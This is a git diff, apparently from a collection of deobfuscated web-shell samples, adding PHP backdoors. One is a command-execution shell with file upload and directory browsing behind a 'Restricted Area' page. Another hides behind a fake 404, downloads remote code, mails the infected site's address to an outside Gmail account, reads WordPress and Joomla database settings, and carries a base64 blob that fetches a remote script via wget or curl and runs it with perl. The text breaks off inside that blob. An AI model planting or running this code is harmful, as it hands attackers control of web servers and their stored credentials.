+		if ($this->options['inmemory'] == 0)
+		{
+			$pwd = getcwd();
+			chdir($this->options['basedir']);
+			if ($fp = gzopen($this->options['name'], "wb{$this->options['level']}"))
+			{
+				fseek($this->archive, 0);
+				while ($temp = fread($this->archive, 1048576))
+					gzwrite($fp, $temp);
+				gzclose($fp);
+				chdir($pwd);
+			}
+			else
+			{
+				$this->error[] = "Could not open {$this->options['name']} for writing.";
+				chdir($pwd);
+				return 0;
+			}
+		}
+		else
+			$this->archive = gzencode($this->archive, $this->options['level']);
+
+		return 1;
+	}
+
+	function open_archive()
+	{
+		return @gzopen($this->options['name'], "rb");
+	}
+}
+
+class bzip_file extends tar_file
+{
+	function bzip_file($name)
+	{
+		$this->tar_file($name);
+		$this->options['type'] = "bzip";
+	}
+
+	function create_bzip()
+	{
+		if ($this->options['inmemory'] == 0)
+		{
+			$pwd = getcwd();
+			chdir($this->options['basedir']);
+			if ($fp = bzopen($this->options['name'], "wb"))
+			{
+				fseek($this->archive, 0);
+				while ($temp = fread($this->archive, 1048576))
+					bzwrite($fp, $temp);
+				bzclose($fp);
+				chdir($pwd);
+			}
+			else
+			{
+				$this->error[] = "Could not open {$this->options['name']} for writing.";
+				chdir($pwd);
+				return 0;
+			}
+		}
+		else
+			$this->archive = bzcompress($this->archive, $this->options['level']);
+
+		return 1;
+	}
+
+	function open_archive()
+	{
+		return @bzopen($this->options['name'], "rb");
+	}
+}
+
+class zip_file extends archive
+{
+	function zip_file($name)
+	{
+		$this->archive($name);
+		$this->options['type'] = "zip";
+	}
+
+	function create_zip()
+	{
+		$files = 0;
+		$offset = 0;
+		$central = "";
+
+		if (!empty ($this->options['sfx']))
+			if ($fp = @fopen($this->options['sfx'], "rb"))
+			{
+				$temp = fread($fp, filesize($this->options['sfx']));
+				fclose($fp);
+				$this->add_data($temp);
+				$offset += strlen($temp);
+				unset ($temp);
+			}
+			else
+				$this->error[] = "Could not open sfx module from {$this->options['sfx']}.";
+
+		$pwd = getcwd();
+		chdir($this->options['basedir']);
+
+		foreach ($this->files as $current)
+		{
+			if ($current['name'] == $this->options['name'])
+				continue;
+
+			$timedate = explode(" ", date("Y n j G i s", $current['stat'][9]));
+			$timedate = ($timedate[0] - 1980 << 25) | ($timedate[1] << 21) | ($timedate[2] << 16) |
+				($timedate[3] << 11) | ($timedate[4] << 5) | ($timedate[5]);
+
+			$block = pack("VvvvV", 0x04034b50, 0x000A, 0x0000, (isset($current['method']) || $this->options['method'] == 0) ? 0x0000 : 0x0008, $timedate);
+
+			if ($current['stat'][7] == 0 && $current['type'] == 5)
+			{
+				$block .= pack("VVVvv", 0x00000000, 0x00000000, 0x00000000, strlen($current['name2']) + 1, 0x0000);
+				$block .= $current['name2'] . "/";
+				$this->add_data($block);
+				$central .= pack("VvvvvVVVVvvvvvVV", 0x02014b50, 0x0014, $this->options['method'] == 0 ? 0x0000 : 0x000A, 0x0000,
+					(isset($current['method']) || $this->options['method'] == 0) ? 0x0000 : 0x0008, $timedate,
+					0x00000000, 0x00000000, 0x00000000, strlen($current['name2']) + 1, 0x0000, 0x0000, 0x0000, 0x0000, $current['type'] == 5 ? 0x00000010 : 0x00000000, $offset);
+				$central .= $current['name2'] . "/";
+				$files++;
+				$offset += (31 + strlen($current['name2']));
+			}
+			else if ($current['stat'][7] == 0)
+			{
+				$block .= pack("VVVvv", 0x00000000, 0x00000000, 0x00000000, strlen($current['name2']), 0x0000);
+				$block .= $current['name2'];
+				$this->add_data($block);
+				$central .= pack("VvvvvVVVVvvvvvVV", 0x02014b50, 0x0014, $this->options['method'] == 0 ? 0x0000 : 0x000A, 0x0000,
+					(isset($current['method']) || $this->options['method'] == 0) ? 0x0000 : 0x0008, $timedate,
+					0x00000000, 0x00000000, 0x00000000, strlen($current['name2']), 0x0000, 0x0000, 0x0000, 0x0000, $current['type'] == 5 ? 0x00000010 : 0x00000000, $offset);
+				$central .= $current['name2'];
+				$files++;
+				$offset += (30 + strlen($current['name2']));
+			}
+			else if ($fp = @fopen($current['name'], "rb"))
+			{
+				$temp = fread($fp, $current['stat'][7]);
+				fclose($fp);
+				$crc32 = crc32($temp);
+				if (!isset($current['method']) && $this->options['method'] == 1)
+				{
+					$temp = gzcompress($temp, $this->options['level']);
+					$size = strlen($temp) - 6;
+					$temp = substr($temp, 2, $size);
+				}
+				else
+					$size = strlen($temp);
+				$block .= pack("VVVvv", $crc32, $size, $current['stat'][7], strlen($current['name2']), 0x0000);
+				$block .= $current['name2'];
+				$this->add_data($block);
+				$this->add_data($temp);
+				unset ($temp);
+				$central .= pack("VvvvvVVVVvvvvvVV", 0x02014b50, 0x0014, $this->options['method'] == 0 ? 0x0000 : 0x000A, 0x0000,
+					(isset($current['method']) || $this->options['method'] == 0) ? 0x0000 : 0x0008, $timedate,
+					$crc32, $size, $current['stat'][7], strlen($current['name2']), 0x0000, 0x0000, 0x0000, 0x0000, 0x00000000, $offset);
+				$central .= $current['name2'];
+				$files++;
+				$offset += (30 + strlen($current['name2']) + $size);
+			}
+			else
+				$this->error[] = "Could not open file {$current['name']} for reading. It was not added.";
+		}
+
+		$this->add_data($central);
+
+		$this->add_data(pack("VvvvvVVv", 0x06054b50, 0x0000, 0x0000, $files, $files, strlen($central), $offset,
+			!empty ($this->options['comment']) ? strlen($this->options['comment']) : 0x0000));
+
+		if (!empty ($this->options['comment']))
+			$this->add_data($this->options['comment']);
+
+		chdir($pwd);
+
+		return 1;
+	}
+}
+
+function copy_paste($c,$s,$d){
+	if(is_dir($c.$s)) {
+    	mkdir($d.$s);
+		$h = @opendir($c.$s);
+		while (($f = @readdir($h)) !== false) {
+			if (($f != ".") and ($f != "..")) {
+                copy_paste($c.$s.DS,$f, $d.$s.DS);
+            }
+        }
+	} elseif(is_file($c.$s)) {
+        @copy($c.$s, $d.$s);
+    }
+}
+
+function system_custom($in) {
+
+    $out = '';
+    $system = false ;
+    if (cust_function_exists('exec')) {
+        $system = true ;
+        @exec($in,$out);
+		$out = @join("\n",$out);
+    } elseif (cust_function_exists('passthru')) {
+        $system = true ;
+		ob_start();
+		@passthru($in);
+		$out = ob_get_clean();
+    } elseif (cust_function_exists('system')) {
+        $system = true ;
+		ob_start();
+		@system($in);
+		$out = ob_get_clean();
+    } elseif (cust_function_exists('shell_exec')) {
+        $system = true ;
+		$out = shell_exec($in);
+    } elseif (is_resource($f = @popen($in,"r"))) {
+        $system = true ;
+		$out = "";
+		while(!@feof($f))
+			$out .= fread($f,1024);
+		pclose($f);
+    }
+
+    if($system) {
+        return $out;
+    }
+
+    $commands = explode(";", $in) ;
+
+    $out = '' ;
+    $path = '' ;
+
+    if($commands) {
+        foreach($commands as $command) {
+            $command_parts = explode(" ", $command) ;
+            $command_head = $command_parts[0] ;
+            $params = array() ;
+            if(count($command_parts) > 1) {
+                for($i=1;$i<count($command_parts);$i++) {
+                    $params[] = trim($command_parts[$i]) ;
+                }
+            }
+
+            switch($command_head) {
+            case "cd":
+                if($params[0]) {
+                    $path = $params[0] ;
+                    if(is_dir($path)) {
+                        @chdir($path) ;
+                    }
+                }
+                break;
+            case "tar":
+                if(count($params) > 1) {
+                    $archive = new gzip_file($params[0]);
+                    $archive->set_options(array('basedir' => $path, 'overwrite' => 1, 'level' => 1));
+                    $archive->add_files(array($params[1]));
+                    $archive->create_archive();
+                }
+                break;
+            case "zip":
+				if(class_exists('ZipArchive') && count($params) > 1) {
+                    $zip = new ZipArchive();
+                    if ($zip->open($params[0], 1)) {
+                        foreach($params as $k=>$param) {
+                            if($k == 0 || $param == '..')
+                                continue;
+                            if(@is_file($param))
+                                $zip->addFile($param, $param);
+                            elseif(@is_dir($param)) {
+                                $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($param.DS));
+                                foreach ($iterator as $key=>$value) {
+                                    $zip->addFile(realpath($key), $key);
+                                }
+                            }
+                        }
+                        $zip->close();
+                    }
+                }
+                break;
+            case "unzip":
+    			if(class_exists('ZipArchive') && count($params) > 0) {
+                    $zip = new ZipArchive();
+                    foreach($params as $k=>$param) {
+                        if($zip->open($param)) {
+                            $zip->extractTo($path);
+                            $zip->close();
+                        }
+                    }
+                }                
+                break;
+            case "cp":
+                smartCopy($params[0], $params[1]) ;
+                break;
+            case "mv":
+                @rename($params[0], $params[1]) ;
+                break;
+            case "rm":
+                foreach($params as $param) {
+                    if(!preg_match("/^-/", $param)) {
+                        if($param == '..')
+                            continue;
+						$param = urldecode($param);
+						if(is_dir($param)) {
+							deleteDir($param);
+                        } elseif(is_file($param)) {
+                            @unlink($param);
+                        }
+                    }
+                }
+                break;
+            case "uname":
+                $out = php_uname(preg_replace("/^-/", "", $params[0])) ;
+                break;
+            case "find":
+                $out = scandir_rec($params[0], true, 1) ;
+                $out = implode("\n", $out) ;
+                break;
+            case "ls":
+                if(isset($params[0]) && $params[0] == '-F') {
+                    $_path = $path ;
+                    if(isset($params[1])) {
+                        $_path = $params[1] ;
+                    }
+                    $out = glob($_path . '/*' , GLOB_ONLYDIR);
+                    if(!empty($out)) {
+                        foreach($out as $k=>$v) {
+                            $out[$k] = preg_replace("/^" . preg_quote($_path.DS,DS) . "/","",$v) . DS ;
+                        }
+                    }
+                    $out = implode("\n", $out) ;
+                } else {
+                    $_path = $path ;
+                    if(isset($params[1])) {
+                        $_path = $params[1] ;
+                    }
+                    $out = glob($_path . '/*');
+                    if(!empty($out)) {
+                        foreach($out as $k=>$v) {
+                            $out[$k] = preg_replace("/^" . preg_quote($path,DS) . "/","",$v) ;
+                        }
+                    }
+                    $out = implode("\n", $out) ;
+                }
+                break;
+            case "mkdir":
+                @mkdir($params[0]) ;
+                break;
+            case "chmod":
+                @chmod($params[1], $params[0]) ;
+                break;   
+            case "phpversion":
+                $out = phpversion() ;
+                break; 
+            case "wso_version":
+                $out = "2.4";
+                break;
+            case "safemode":
+                $out = @ini_get('safe_mode') ;
+                break;
+            case 'pwd':
+                $out = getcwd() ;
+                break;
+            default:
+                break;
+            }
+        }
+    }
+
+    return $out ;
+
+}
+
+print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
+print "<center><h1>Restricted</h1></center>";
+print "<center><h1>Area</h1></center>";
+print "<hr><hr>";
+
+if(isset($_POST['_cwd'])) {
+    $currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
+} else {
+    $currentWD = '' ;
+}
+if(isset($_POST['_cmd'])) {
+    $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
+} else {
+    $currentCMD = '' ;
+}
+
+$UName  = system_custom('uname -a');
+$SCWD   = system_custom('pwd');
+$UserID = system_custom('id');
+
+if( $currentWD == "" ) {
+    $currentWD = $SCWD;
+}
+
+print "<table>";
+print "<tr><td><b>?:</b></td><td>".(isset($_SERVER['REMOTE_HOST'])?$_SERVER['REMOTE_HOST']:"")." (".(isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:"").")</td></tr>";
+print "<tr><td><b>s is:</b></td><td>".(isset($_SERVER['SERVER_SIGNATURE'])?$_SERVER['SERVER_SIGNATURE']:"")."</td></tr>";
+print "<tr><td><b>ce e?:</b></td><td>$UName</td></tr>";
+print "<tr><td><b>wtf:</b></td><td>$UserID</td></tr>";
+print "</table>";
+
+print "<hr><hr>";
+
+if( isset($_POST['_act']) && $_POST['_act'] == "List files!" ) {
+    $currentCMD = "ls -la";
+}
+
+print "<form method=post enctype=\"multipart/form-data\"><table>";
+
+print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
+print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
+
+print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
+print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
+
+print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
+print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
+
+print "</table></form><hr><hr>";
+
+$currentCMD = str_replace("\\\"","\"",$currentCMD);
+$currentCMD = str_replace("\\\'","\'",$currentCMD);
+
+if( isset($_POST['_act']) && $_POST['_act'] == "Upload!" ) {
+    if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
+        print "<center><b>Error while uploading file!</b></center>";
+    } else {
+        print "<center><pre>";
+        if(!@move_uploaded_file($_FILES['_upl']['tmp_name'], $currentWD."/".$_FILES['_upl']['name'])) {
+            $out = system_custom("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
+        }
+        echo $out ;
+        print "</pre><b>File uploaded successfully!</b></center>";
+    }    
+} else {
+    print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
+    $currentCMD = "cd ".$currentWD.";".$currentCMD;
+    $out = system_custom($currentCMD);
+    echo $out ;
+    print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
+}
+
+exit;
+
+?>
diff --git a/Deobfuscated/WebShell_b8b880447058dcacd60ab52be80279e32f9cdaeb.php b/Deobfuscated/WebShell_b8b880447058dcacd60ab52be80279e32f9cdaeb.php
new file mode 100644
index 0000000..378e78d
--- /dev/null
+++ b/Deobfuscated/WebShell_b8b880447058dcacd60ab52be80279e32f9cdaeb.php
@@ -0,0 +1,506 @@
+<?php error_reporting(0);
+set_time_limit(0);
+class roin {
+    private $access = array('www-data', 'www', 'apache');
+    private $type, $os, $user;
+    public function __construct() {
+        $this->user = get_current_user();
+        $this->os = $this->check("os");
+        $this->type = $this->check("cmd");
+        if (!isset($_GET['1180'])) {
+            if (isset($_GET['x1'])) {
+                $this->form();
+                echo ($this->os == "windows") ? '<pre>' . $this->exe('dir') . '</pre>' : '<pre>' . $this->exe('ls -la') . '</pre>';
+            } else {
+                header("HTTP/1.0 404 Not Found");
+                header("Status: 404 Not Found");
+                echo "<h1>Error 404 Not Found</h1>";
+                echo "The page that you have requested could not be found.";
+                die();
+                exit();
+            }
+        } else {
+            if (isset($_GET['x'])) {
+                switch ($_GET['x']) {
+                    case 'get':
+                        if (isset($_GET['file'])) {
+                            $file = urldecode($_GET['file']);
+                            $name = (isset($_GET['name'])) ? $_GET['name'] : "px.php";
+                            $code = file_get_contents($file);
+                            $myfile = fopen($name, "w+");
+                            fwrite($myfile, $code);
+                            fclose($myfile);
+                        }
+                    break;
+                    case 'plbot':
+                        $this->plBot();
+                    break;
+                    case 'clear':
+                        $this->delete("px.php");
+                        $this->delete("pl.php");
+                    break;
+                    case 'read':
+                        if (isset($_GET['path'])) {
+                            $path = urldecode($_GET['path']);
+                            $this->setDB($path);
+                        }
+                    break;
+                    case 'jdb':
+                        $this->joomlaDb();
+                    break;
+                    case 'wpdb':
+                        $this->wpDb();
+                    break;
+                    case 'mail':
+                        $mail = (isset($_GET['to'])) ? urldecode($_GET['to']) : "setoran.target26@gmail.com";
+                        $host = $_SERVER["HTTP_HOST"];
+                        $uri = $_SERVER["REQUEST_URI"];
+                        $serv = gethostbyname($_SERVER['SERVER_ADDR']);
+                        $addr = gethostbyname($_SERVER['REMOTE_ADDR']);
+                        mail($mail, "kiriman bos " . $host . $uri, "Url:" . $host . $uri . " nIp :$servn Ip injector: $addr");
+                    break;
+                    case 'clone':
+                        if (isset($_GET['path'])) {
+                            $path = urldecode($_GET['path']);
+                            if (strstr($path, ",")) {
+                                $data = explode(",", $path);
+                                if (is_array($data) && count($data) > 0) {
+                                    $data = array_filter($data);
+                                    if (count($data) > 0) {
+                                        foreach ($data as $k) {
+                                            $this->setClone($k);
+                                        }
+                                    }
+                                }
+                            } else {
+                                $path = urldecode($_GET['path']);
+                                $this->setClone($path);
+                            }
+                        } else {
+                            $this->setClone('../.inc.php');
+                            $this->setClone('../../.inc.php');
+                        }
+                    break;
+                    case 'patch':
+                        $lock = (isset($_GET['lock'])) ? 1 : 0;
+                        $force = (isset($_GET['force'])) ? 1 : 0;
+                        $path = "";
+                        if (isset($_GET['path'])) {
+                            $path = urldecode($_GET['path']);
+                            if (strstr($path, ",")) {
+                                $path = explode(",", $path);
+                            }
+                        }
+                        if (isset($_GET['allow'])) {
+                            $files = urldecode($_GET['allow']);
+                            if (strstr($files, ",")) {
+                                $file = explode(",", $files);
+                                $this->setPatch($user, $file, $lock, $path, $force);
+                            } else {
+                                $this->setPatch($user, $files, $lock, $path, $force);
+                            }
+                        } else {
+                            $this->setPatch($user, "", $lock, $path, $force);
+                        }
+                    break;
+                    case 'chmod':
+                        if (isset($_GET['dir'])) {
+                            $dir = $_GET['dir'];
+                            if ($dir == 1) {
+                                chmod("./", 0555);
+                            } else if ($dir == 2) {
+                                chmod("./", 0555);
+                                chmod("../", 0555);
+                            } else if ($dir == 3) {
+                                chmod("./", 0555);
+                                chmod("../", 0555);
+                                chmod("../../", 0555);
+                            } else {
+                                $dir = str_replace("|", "/", $dir);
+                                chmod($dir, 0555);
+                            }
+                        }
+                        break;
+                    case 'die':
+                        $source = $_SERVER['SCRIPT_FILENAME'];
+                        @unlink($source);
+                        break;
+                    }
+                } else {
+                    if (isset($_GET['del'])) {
+                        $del = $_GET['del'];
+                        if (strstr($del, ",")) {
+                            $data = explode(",", $del);
+                            if (is_array($data) && count($data) > 0) {
+                                $data = array_filter($data);
+                                foreach ($data as $k) {
+                                    $this->delete($k);
+                                }
+                            }
+                        } else {
+                            $this->delete($del);
+                        }
+                    }
+                    $this->getForm();
+                }
+        }
+    }
+    private function plBot() {
+        $code = "PD9waHANCiR1cmwgPSAoaXNzZXQoJF9HRVRbJ3VybCddKSkgPyB1cmxkZWNvZGUoJF9HRVRbJ3VybCddKSA6ICJodHRwOi8vd3d3LmhvdGVscmlzdG9yYW50ZWxlcGFudG8uaXQvZm9ybS8vLi4uL3JvYm90LnR4
+
+dCI7DQoNCmlmKGZ1bmN0aW9uX2V4aXN0cygnZXhlYycpKXsNCglAZXhlYygnd2dldCAnLiR1cmwuJyAtTyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQGV
+
+4ZWMoJ2N1cmwgJy4kdXJsLicgLW8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdsd3AtZG93bmxvYWQgLWEgJy4kdXJsLicgcm9ib3QudHh0O3
+
+Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdseW54IC1zb3VyY2UgJy4kdXJsLicgPiByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gL
+
+WZyIHJvYioudHh0Jyk7DQoJQGV4ZWMoJ2ZldGNoIC1vIHJvYm90LnR4dCAnLiR1cmwuJztwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAZXhlYygnR0VUICcuJHVybC4nID5y
+
+b2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQGV4ZWMoJ3JtIC1yZiByb2IqLnR4dCcpOw0KCUBleGVjKCdjZCAvdG1wO3dnZXQgJy4kdXJsLicgLU8gcm9ib3Q
+
+udHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdjZCAvdG1wO2N1cmwgJy4kdXJsLic7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYi
+
+oudHh0Jyk7DQoJQGV4ZWMoJ2NkIC90bXA7bHdwLWRvd25sb2FkIC1hICcuJHVybC4nIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAZXhlYygnY2QgL3Rtc
+
+DtseW54IC1zb3VyY2UgJy4kdXJsLicgPiByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQGV4ZWMoJ2NkIC90bXA7ZmV0Y2ggLW8gcm9ib3QudHh0ICcuJHVy
+
+bC4nO3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdjZCAvdG1wO0dFVCAnLiR1cmwuJyA
+
++cm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdybSAtcmYgaW5kZXgucGhwLionKTsNCglAZXhlYygnY2QgL3RtcDtybSAtcmYgcm9iKi50eHQnKT
+
+sNCglAZXhlYygncm0gLXJmIHJvYioudHh0Jyk7DQoJQGV4ZWMoJ2NkIC90bXA7cm0gLXJmIHJvYioudHh0KicpOw0KCUBleGVjKCdybSAtcmYgcm9iKi50eHQqJyk7DQp9IGVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZ
+
+WxsX2V4ZWMnKSl7DQoJQHNoZWxsX2V4ZWMoJ3dnZXQgJy4kdXJsLicgLU8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzaGVsbF9leGVjKCdjdXJsICcu
+
+JHVybC4nIC1vIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnbHdwLWRvd25sb2FkIC1hICcuJHVybC4nIHJvYm90LnR4dDtwZXJsIHJ
+
+vYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnbHlueCAtc291cmNlICcuJHVybC4nID4gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC
+
+1mciByb2IqLnR4dCcpOw0KCUBzaGVsbF9leGVjKCdmZXRjaCAtbyByb2JvdC50eHQgJy4kdXJsLic7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHNoZWxsX2V4ZWMoJ0dFV
+
+CAnLiR1cmwuJyA
+
++cm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzaGVsbF9leGVjKCdybSAtcmYgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnY2QgL3RtcDt3Z2V0ICcuJH
+
+VybC4nIC1PIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnY2QgL3RtcDtjdXJsICcuJHVybC4nO3Blcmwgcm9ib3QudHh0O3Blcmwgc
+
+m9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzaGVsbF9leGVjKCdjZCAvdG1wO2x3cC1kb3dubG9hZCAtYSAnLiR1cmwuJyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJv
+
+YioudHh0Jyk7DQoJQHNoZWxsX2V4ZWMoJ2NkIC90bXA7bHlueCAtc291cmNlICcuJHVybC4nID4gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzaGVsbF9
+
+leGVjKCdjZCAvdG1wO2ZldGNoIC1vIHJvYm90LnR4dCAnLiR1cmwuJztwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnY2QgL3RtcDtHRVQgJy4kdXJsLi
+
+cgPnJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnY2QgL3RtcDtybSAtcmYgaW5kZXgucGhwLionKTsNCglAc2hlbGxfZXhlYygnY2QgL
+
+3RtcDtybSAtcmYgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygncm0gLXJmIHJvYioudHh0Jyk7DQoJQHNoZWxsX2V4ZWMoJ2NkIC90bXA7cm0gLXJmIHJvYioudHh0KicpOw0KCUBzaGVsbF9leGVjKCdybSAtcmYgcm9i
+
+Ki50eHQqJyk7DQp9ZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KCUBzeXN0ZW0oJ3dnZXQgJy4kdXJsLicgLU8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2I
+
+qLnR4dCcpOw0KCUBzeXN0ZW0oJ2N1cmwgJy4kdXJsLicgLW8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzeXN0ZW0oJ2x3cC1kb3dubG9hZCAtYSAnLi
+
+R1cmwuJyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHN5c3RlbSgnbHlueCAtc291cmNlICcuJHVybC4nID4gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O
+
+3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzeXN0ZW0oJ2ZldGNoIC1vIHJvYm90LnR4dCAnLiR1cmwuJztwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglA
+
+c3lzdGVtKCdHRVQgJy4kdXJsLic7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHN5c3RlbSgncm0gLXJmIHJvYioudHh0Jyk7DQoJQHN5c3RlbSgnY2QgL3RtcDt3Z2V0ICc
+
+uJHVybC4nIC1PIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdjZCAvdG1wO2N1cmwgJy4kdXJsLicgLW8gcm9ib3QudHh0O3Blcmwgcm9ib3
+
+QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzeXN0ZW0oJ2NkIC90bXA7bHdwLWRvd25sb2FkIC1hICcuJHVybC4nIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtyb
+
+SAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdjZCAvdG1wO2x5bnggLXNvdXJjZSAnLiR1cmwuJyA
+
++IHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdjZCAvdG1wO2ZldGNoIC1vIHJvYm90LnR4dCAnLiR1cmwuJztwZXJsIHJvYm90LnR4dDtwZX
+
+JsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdjZCAvdG1wO0dFVCAnLiR1cmwuJztwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdyb
+
+SAtcmYgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdjZCAvdmFyL3RtcDtybSAtcmYgaW5kZXgucGhwLionKTsNCglAc3lzdGVtKCdjZCAvdG1wO3JtIC1yZiByb2IqLnR4dCcpOw0KCUBzeXN0ZW0oJ2NkIC90bXA7cm0gLXJm
+
+IHJvYioudHh0KicpOw0KfSBlbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKXsNCglAcGFzc3RocnUoJ3dnZXQgJy4kdXJsLicgLU8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3J
+
+tIC1mciByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgnY3VybCAnLiR1cmwuJyAtbyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHBhc3N0aHJ1KCdsd3AtZG
+
+93bmxvYWQgLWEgJy4kdXJsLicgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgnbHlueCAtc291cmNlICcuJHVybC4nID4gcm9ib3QudHh0O
+
+3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgnZmV0Y2ggLW8gcm9ib3QudHh0ICcuJHVybC4nIDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAt
+
+ZnIgcm9iKi50eHQnKTsNCglAcGFzc3RocnUoJ0dFVCAnLiR1cmwuJyA
+
